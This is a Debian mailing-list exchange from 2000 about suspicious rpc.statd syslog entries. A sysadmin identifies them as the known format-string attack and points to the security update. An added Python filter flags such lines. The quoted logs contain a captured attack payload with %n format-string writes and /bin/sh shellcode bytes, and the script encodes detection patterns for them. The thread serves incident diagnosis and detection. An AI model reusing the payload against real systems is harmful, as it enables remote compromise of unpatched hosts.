
Re: weird rpc.statd messages on potato



Hmm, well we're on nfs-utils (1:0.1.9.1-1), so would that mean
that someone is trying the exploit on us? Any way to tell where
this is coming from?

BTW, what was the exploit, some kind of overflow?

On Mon, Nov 06, 2000 at 10:29:04PM -0600, Damian Menscher wrote:
> On Mon, 6 Nov 2000, Rob wrote:
> 
> > Getting the following in our /var/log/messages
> > 
> > We use NFS between two Potato boxes, this appears on
> > both:
> > 
> > Nov  6 08:03:19 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> > Nov  6 08:03:21 rudy 173>Nov  6 08:03:21 /sbin/rpc.statd[152]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ
> > Nov  6 08:03:21 rudy Ç^F/binÇF^D/shA0À?F^G?v^L?V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
> 
> Congratulations!  Assuming you haven't patched past the default install,
> you've just been hacked!
> 
> This is a well-known attack on rpc.statd that was first publicized on
> bugtraq in mid-July (you can search the archives at
> www.securityfocus.com).  If you haven't updated your potato since then,
> you're probably a goner.  According to the page
> www.debian.org/security/2000/20000719a if you're running nfs-common
> 0.1.9.1-1 or later you should be safe.  Otherwise reinstall and apt-get
> the security updates this time.
> 
> Damian Menscher
> -- 
> --==## Grad. student & Sys. Admin. @ U. Illinois at Urbana-Champaign ##==--
> --==## <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Ofc:(217)333-0038 ##==--
> --==## Physics Dept, 1110 W Green, Urbana IL 61801 Fax:(217)333-9819 ##==--
> 
> 
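
An added example, not part of the original messages: a small Python filter that flags syslog lines like the ones quoted above, where the host name logged by rpc.statd carries printf conversions such as %8x and %n instead of a real name, or where a shell path appears among binary bytes. The regexes, function names and sample lines are assumptions constructed for illustration.

```python
import re

# rpc.statd logs the caller-supplied host name verbatim in this message.
STATD_ERR = re.compile(r"rpc\.statd\[\d+\]: gethostbyname error for (?P<name>.*)$")
# printf-style conversions such as %8x, %236x or %n (group 1 = conversion letter).
FMT = re.compile(r"%[-+ #0]*\d*(?:\.\d+)?[hlL]*([diouxXcspn])")
# A legitimate host name only uses letters, digits, dots and hyphens.
VALID_HOST = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,254}$")


def classify(line):
    """Return the reasons a syslog line looks like a statd format-string probe."""
    reasons = []
    m = STATD_ERR.search(line)
    if m:
        name = m.group("name")
        convs = FMT.findall(name)
        if "n" in convs:
            reasons.append("%n (memory write) conversion in host name")
        elif convs:
            reasons.append("printf conversion in host name")
        if not VALID_HOST.match(name):
            reasons.append("host name contains non-hostname characters")
    elif "/bin" in line and "/sh" in line and not line.isascii():
        reasons.append("shell path mixed with binary bytes outside any daemon tag")
    return reasons


def scan(lines):
    """Yield (line_number, reasons) for every suspicious line."""
    for no, line in enumerate(lines, 1):
        reasons = classify(line.rstrip("\n"))
        if reasons:
            yield no, reasons


# Constructed sample input, shortened from the shape of the lines quoted above.
SAMPLE = [
    "Nov  6 08:01:02 rudy /sbin/rpc.statd[152]: gethostbyname error for fileserver2",
    "Nov  6 08:03:19 rudy \u00c7\x06/bin\u00c7F\x04/shA0\u00c0",
    "Nov  6 08:03:21 rudy /sbin/rpc.statd[152]: gethostbyname error for "
    "\u00f7\u00ff\u00bf%8x%8x%8x%236x%n%137x%n",
    "Nov  6 08:05:00 rudy kernel: nfs: server rudy2 OK",
]

if __name__ == "__main__":
    for no, reasons in scan(SAMPLE):
        print(f"line {no}: " + "; ".join(reasons))
```

The message rpc.statd writes contains only the supplied name, so a match here shows that an attempt was logged, not which address sent it.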


